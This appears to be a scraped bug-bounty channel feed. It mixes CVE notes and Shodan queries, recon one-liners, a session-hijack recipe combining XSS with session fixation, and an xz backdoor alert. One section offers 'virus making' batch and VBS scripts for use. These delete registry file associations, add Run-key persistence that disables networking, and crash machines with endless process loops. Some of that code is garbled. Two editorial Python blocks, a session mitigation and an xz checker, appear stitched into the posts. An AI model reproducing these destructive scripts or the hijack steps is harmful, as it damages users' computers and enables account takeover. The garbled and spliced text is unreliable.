Bug bounty Tips
🛡️ Cybersecurity enthusiast | 💻 Helping secure the digital world | 🌐 Web App Tester | 🕵️♂️ OSINT Specialist Admin: @laazy_hack3r
Repost from 1N73LL1G3NC3
CVE-2024-28995: High-Severity Directory Traversal Vulnerability affecting SolarWinds Serv-U.
SolarWinds Serv-U was susceptible to a directory traversal vulnerability that allowed reading sensitive files on the host machine.
POC: https://github.com/rapid7/metasploit-framework/pull/19255
Query:
Hunter: protocol.banner="Serv-U FTP"
FOFA: app="SolarWinds-Serv-U-FTP"
SHODAN: product:"Serv-U ftpd"
🦠Top Virus Making Commands From Notepad🦠
🟣1. Disable Internet Permanently
:-
echo @echo off>c:windowswimn32.bat
echo break off>c:windowswimn32.bat echo
ipconfig/release_all>c:windowswimn32.bat
echo end>c:windowswimn32.batreg add
hkey_local_machinesoftwaremicrosoftwindowscurrentversionrun /v WINDOWsAPI /t reg_sz /d c:windowswimn32.bat /freg add
hkey_current_usersoftwaremicrosoftwindowscurrentversionrun /v CONTROLexit /t reg_sz /d c:windowswimn32.bat /fecho You Have Been HACKED!
PAUSE
🃏Action :- This code will disable the internet connectivity permanently.
🟣2. Delete Key Registry Files
:-
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO Your PC has been crashed.Your Dad.
GOTO MESSAGE
🃏Action :- This will delete key registry files, then loops a message
This is a dangerous and unrecoverable Notepad virus.
🟣3.Endless Notepads
:-
@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
🃏Action :- This will pop up endless notepads until the computer freezes and crashes
🟣4. Popping Cd Drive
:-
Set oWMP = CreateObject(”WMPlayer.OCX.7″)
Set colCDROMs = oWMP.cdromCollection
do
if colCDROMs.Count >= 1 then
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
For i = 0 to colCDROMs.Count – 1
colCDROMs.Item(i).Eject
Next
End If
wscript.sleep 100
loop
🃏Action :- This will make the CD drives constantly pop out
🟣 5. Endless Enter
:-
Set wshShell = wscript.CreateObject(”WScript.Shell”)
do
wscript.sleep 100
wshshell.sendkeys “~(enter)”
loop
🃏Action :- This will make the enter button pressed continuously
🔰Save All With Extension . bat
⚠️Note :- I am Not Responsible For Any Damage To Your Computer
Want 50 reaction in this post family 🫂
Guys, please tell me your thoughts on this: I am planning to start a video explanation on bug bounty hunting, so what are the things I need to change? Please let me know, guys.
Guys, check this out: a book summary app where you can start reading in your free time. I loved this app and I hope you guys love it too; if yes, give it a reaction.
https://dsta.sh/mnA6TcBrYYingNzm7
Bug Bounty Hint
How to Perform Session Hijack with XSS + Session Fixation When the Session Cookie is HttpOnly
Steps:
1) Create a session cookie with an unauthenticated session value on the /login path using JavaScript.
2) Force the user to log out.
3) When the user logs back in, they will use the unauthenticated session.
Details:
The attacker creates a session cookie on another browser, then injects that session into the victim's account by overriding the existing HttpOnly cookie with a similar cookie name but a different value on a different path.
sess=aaaa; path=/login; expires=Fri, 17 Jun 2024 10:00:00
When the login form is submitted, it will contain two cookies. The one created with JavaScript on the /login path will be first, followed by the HttpOnly cookie on the different path /.
Cookie: sess=aaaa; sess=bbbb;
Since the website has a Session Fixation bug, no new session will be generated when the user logs in. Because there are two session cookies, only the first one from the attacker (sess=aaaa) will be used, and the logged-in user will be attached to it.
The final step is to use the unauthenticated session that was previously created on the attacker's browser for all website actions from the attacker's side.
Cheers!
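The post above relies on two server-side behaviours: the login handler keeps whatever `sess` id the request already carries (session fixation), and when the Cookie header carries two `sess` values the first one wins. The following is an added defender-side example, not code from the post; it simulates both behaviours in a small in-memory session store and shows the mitigation: refuse a login whose Cookie header contains the session name twice, and always issue a fresh id on successful login so any pre-login id the attacker knows becomes useless. The store class, the `sess` name and the ids `aaaa`/`bbbb` are assumptions taken from the post's own illustration.

```python
import secrets


def parse_cookie_header(header: str):
    """Split a Cookie request header into (name, value) pairs, preserving the
    order the browser sent them. Unlike a dict, duplicate names are kept."""
    pairs = []
    for part in header.split(";"):
        part = part.strip()
        if not part or "=" not in part:
            continue
        name, _, value = part.partition("=")
        pairs.append((name.strip(), value.strip()))
    return pairs


def first_cookie(pairs, name):
    """What many frameworks do when a name repeats: the first occurrence wins."""
    for n, v in pairs:
        if n == name:
            return v
    return None


def duplicate_names(pairs):
    """Cookie names that appear more than once (a sign of cookie tossing)."""
    seen, dups = set(), set()
    for n, _ in pairs:
        if n in seen:
            dups.add(n)
        seen.add(n)
    return dups


class SessionStore:
    """In-memory session table: session id -> username (None = anonymous)."""

    def __init__(self):
        self.sessions = {}

    def new_session(self):
        sid = secrets.token_urlsafe(16)
        self.sessions[sid] = None
        return sid

    def login_vulnerable(self, cookie_header, user):
        """Session fixation: reuses whatever 'sess' id the request carried,
        so an id the attacker planted becomes the victim's logged-in session."""
        pairs = parse_cookie_header(cookie_header)
        sid = first_cookie(pairs, "sess")
        if sid is None or sid not in self.sessions:
            sid = self.new_session()
        self.sessions[sid] = user
        return sid

    def login_hardened(self, cookie_header, user):
        """Mitigation: refuse ambiguous requests and always rotate the id."""
        pairs = parse_cookie_header(cookie_header)
        if "sess" in duplicate_names(pairs):
            raise ValueError("multiple 'sess' cookies in request; refusing login")
        old = first_cookie(pairs, "sess")
        if old in self.sessions:
            del self.sessions[old]  # the pre-login id is invalidated, not promoted
        sid = self.new_session()
        self.sessions[sid] = user
        return sid


if __name__ == "__main__":
    # Constructed scenario: the attacker already holds the anonymous id "aaaa".
    header = "sess=aaaa; sess=bbbb"
    vuln = SessionStore()
    vuln.sessions["aaaa"] = None
    print("vulnerable login bound user to:", vuln.login_vulnerable(header, "victim"))
    safe = SessionStore()
    safe.sessions["aaaa"] = None
    try:
        safe.login_hardened(header, "victim")
    except ValueError as e:
        print("hardened login rejected:", e)
```

Rotating the id on login is the fix for the fixation bug itself; rejecting duplicate session cookie names is an additional check, since a legitimate browser never sends the same session name twice on its own.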
Arjun + KXSS
Finding
- Parameter
- XSS
arjun -q -u target -oT arjun && cat arjun | awk -F'[?&]' '{baseUrl=$1; for(i=2; i<=NF; i++) {split($i, param, "="); print baseUrl "?" param[1] "="}}' | kxss
#bugbountytips #bugbounty
Guys, happy to share today that my blog is back again:
https://Book.cipherops.xyz
You guys can check it out and let me know your thoughts, and don't forget to leave comments.
[ XZ backdoor - CVE-2024-3094 ]
! Backdoor in upstream xz/liblzma leading to SSH server compromise !
Check:
xz --version
5.6.0 & 5.6.1: vulnerable
Update:
sudo apt update && sudo apt install --only-upgrade liblzma5
Summary:
https://boehs.org/node/everything-i-know-about-the-xz-backdoor
How it all started (email):
https://www.openwall.com/lists/oss-security/2024/03/29/4
GitHub Thread:
https://web.archive.org/web/20240329223553/https://github.com/tukaani-project/xz/issues/92
Message from Kali Linux team:
https://twitter.com/kalilinux/status/1773786266074513523
The xz package, starting from version 5.6.0 to 5.6.1, was found to contain a backdoor. The impact of this vulnerability affected Kali between March 26th to March 29th. If you updated your Kali installation on or after March 26th, it is crucial to apply the latest updates today.
Note that (almost) all Linux distros could be affected!
For example, Fedora — Red Hat warned users to immediately stop using systems running Fedora development and experimental versions:
https://www.bleepingcomputer.com/news/security/red-hat-warns-of-backdoor-in-xz-tools-used-by-most-linux-distros
News:
https://www.helpnetsecurity.com/2024/03/29/cve-2024-3094-linux-backdoor
And from CISA:
https://www.cisa.gov/news-events/alerts/2024/03/29/reported-supply-chain-compromise-affecting-xz-utils-data-compression-library-cve-2024-3094
So... JiaT75 made 750 commits in 2 years and finally backdoored XZ...
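The check in the post is a manual comparison of `xz --version` output against 5.6.0 and 5.6.1. As an added example (editor's code, not from the post or from any distro's advisory), the script below automates that check in a way that can be dropped into a fleet audit: it parses both lines that `xz --version` prints (the `xz` binary line and the `liblzma` line, the latter being where the backdoor lived), flags either of the two named versions, and treats a missing binary as "unknown" rather than "clean". The version set is taken from the post; everything else is an assumption.

```python
import subprocess

# Versions the post names as backdoored (CVE-2024-3094).
BACKDOORED = {(5, 6, 0), (5, 6, 1)}


def parse_version(token: str):
    """'5.6.1' -> (5, 6, 1); returns None for anything that is not x.y.z digits."""
    parts = token.split(".")
    if len(parts) != 3 or not all(p.isdigit() for p in parts):
        return None
    return tuple(int(p) for p in parts)


def versions_in_output(output: str):
    """Map each component named in `xz --version` output to its version tuple.
    Typical output is two lines: 'xz (XZ Utils) X.Y.Z' and 'liblzma X.Y.Z';
    both are checked because the library, not the binary, carried the backdoor."""
    found = {}
    for line in output.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        version = parse_version(tokens[-1])
        if version is not None:
            found[tokens[0]] = version
    return found


def is_backdoored(output: str) -> bool:
    """True if any component reported by xz is one of the backdoored releases."""
    return any(v in BACKDOORED for v in versions_in_output(output).values())


def check_local_xz():
    """Run `xz --version` on this host. Returns True/False, or None if xz is absent."""
    try:
        proc = subprocess.run(["xz", "--version"], capture_output=True,
                              text=True, check=False)
    except FileNotFoundError:
        return None
    return is_backdoored(proc.stdout)


if __name__ == "__main__":
    result = check_local_xz()
    print({None: "xz not installed", True: "VULNERABLE", False: "ok"}[result])
```

Distributions that shipped the reverted packages (for example Debian's `5.6.1+really5.4.5`) still print `5.4.5` from `xz --version`, so the parser deliberately keys on the reported runtime version rather than the package name.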
Today, we'll talk a bit about JavaScript recon in web applications. I've based my methodology on My Javascript Recon Process - BugBounty.
Collecting links to JS files can be done using gau:
gau example.com | grep -iE '\.js' | grep -ivE '\.json' | sort -u >> exampleJS.txt
Alternatively, you can use waymore, which seems to be better:
python3 waymore.py -i example.com -ko "\.js(\?|$)"
We can also try fuzzing to find hidden JS files:
ffuf -u https://www.example.com/js/ -w jsWordlist.txt -t 200
The wordlist for fuzzing can be found here: https://wordlists.assetnote.io/
After that, ping the JS links as some of them may be outdated.
httpx -l exampleJS.txt -mc 200
Now, let's look for secrets in these files using SecretFinder, a tool for detecting sensitive data such as API keys, access tokens, authorization headers, JWTs, etc. in a JS file:
cat exampleJS.txt | xargs -n2 -I @ bash -c 'echo -e "\n[URL] @\n";python3 SecretFinder.py -i @ -o cli' >> exampleJsSecrets.txt
Next, using availableForPurchase.py, we can check if the domains referenced in the JS files are available for purchase. This tool, combined with linkfinder and collector, is really powerful. Sometimes developers make mistakes when writing a domain, possibly the domain imports an external JavaScript file, etc.
cat exampleJS.txt | xargs -I @ bash -c 'python3 linkfinder.py -i @ -o cli' | python3 collector.py output
cat output/urls.txt | python3 availableForPurchase.py
[NO] www.googleapis.com
[YES] www.gooogleapis.com
After executing the above command, a list of potential endpoints that were discovered in the JS becomes available for review:
cat output/paths.txt
We can also immediately check for subdomain takeover using subzy:
cat output/urls.txt |grep "https\{0,1\}://[^/]*\.example\.com/[^ ]*" >> subdomainExample.txt; subzy run --targets subdomainExample.txt
Also, excellent extensions for Burp: JS Miner and JS Link Finder, which perform similar tasks but in real time. For greater coverage it's better to use both script scanning and the plugins.